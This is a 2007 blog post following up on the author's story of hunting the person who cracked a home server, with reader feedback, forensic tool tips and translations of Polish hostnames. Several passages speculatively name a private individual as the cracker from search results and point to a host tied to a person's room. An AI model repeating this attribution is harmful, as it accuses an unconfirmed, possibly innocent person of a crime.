3 Nov 2007

Holiday cracking - redux

The "holiday cracking" story got far more attention than I ever would have imagined. If I had known it would get so massive attention, I sure would have done a more throughly job. Interestingly, after the posting I have received some pretty interesting feedback - even an email from the cracker himself! It sure helps getting on Slashdot and posted on Bruce Schneier's blog!

In fact, when the story hit /., I first thought that I was finally being DoS'ed by an angry exposed cracker. But I quickly found out that it was the "normal" slashdot effect. You can see the traffic increase from the graph: The first traffic increase is from Schneier (week 33), the second is slashdot (week 34).

First one clarification. The cracked server was an (old and rusty) personal server, hosting nothing more than backup of some digital pictures hooked up through ADSL. The server was not part of production system running some critical services. The only exposed services to the Internet were SSH and Apache (no PHP as I recall). Hunting down this little cracker was just for fun.

It was also interesting to read the comments. A lot of the usual nonsense crap ("I pity the fool who cracks your system, fool!"), to more fun details ("He should've symlinked .bash_history to /dev/random!") but also some very helpful and constructive comments. I would in particular mention the SANS whitepaper "Dead Linux Machines Do Tell Tales" by James Fung - a couple of years old, but still a very interesting read. Another good tip, was the software chkrootkit and rkhunter, both helpful in finding and identifying rootkits.

Several polish users have sent me translations from the hosts used in the crack:

The cacker used the bot "psotnic" which translates to "rascal" or "urchin". Se wikipedias entry on psotnic for more info.
  • "4lo.bydg.pl" - IV High School in Bydgoszcz. The IP-address resolves to this host.
  • "matsys" - A popular nickname. Short version of "Mateusz" (male).
  • "pliki" - files.
So wget gives more sense.

A polish reader, Michal Bartkowiak, did some more digging on the polish web-pages and found more interesting stuff:

Ok, so let's take a look at this school website (4lo.bydg.pl). Search
option is in menu on left side ("szukaj" in polish). But search for
what? Maybe "matys".. nothing. I'm assuming that name of this account's
owner is "Mateusz".. three results. Click on first one
( http://4lo.bydg.pl//index.php?option=com_content&task=section&id=44&Itemid=93)

and you will get a list of names from competition. Three persons with
first name "Mateusz". Wait a minute, surname of first guy is "Lapinski"
(written without polish fonts), which looks very fimilar to LaPi. And it
makes sense in our language to create nick like this from surname
"Lapinski". While Lapinski is not very popular name, it still can be
just coincidence or my imagination. Or another hacked account of course.

Anyway, that's a good time for google. Search for "matys
site:4lo.bydg.pl" shows some activity on this account, e.g. index of
/~matys/foty/02-07-2007 ("foty" means "photos").
Search for "lapi+psotnic" returns userlist generated by psotnic version
0.2.11. Guess what? lapi is there. With IP from polish ISP
( http://hoth.amu.edu.pl/~esio/smieci/hub.ul).

Actually, when I searched for "lapi+psotnic" on google, a web-site called exy.hu popped up. Now this site has all kinds of nice crack software available, lists of username/password to a bunch of porn sites and a whole range of crew pictures. And guess what, a picture file there named lapi.jpg! (Fetch here: http://exy.hu/kepek/crew/Lapi/lapi.jpg). Is this our LaPi?

I also received an interesting mail from one former student and sysadmin of panorama.sth.ac.at. He could tell me that the host campus19.panorama.sth.ac.at was not NATed, but in fact one of the few IP-addresses that still is a FQDN. So he had both the name and the room-number of the alleged cracker! He should alert the administrators on-site and come back to me as soon as they had investigated further. This was one month ago, but (unfortunate) I have still not heard anything.

No comments: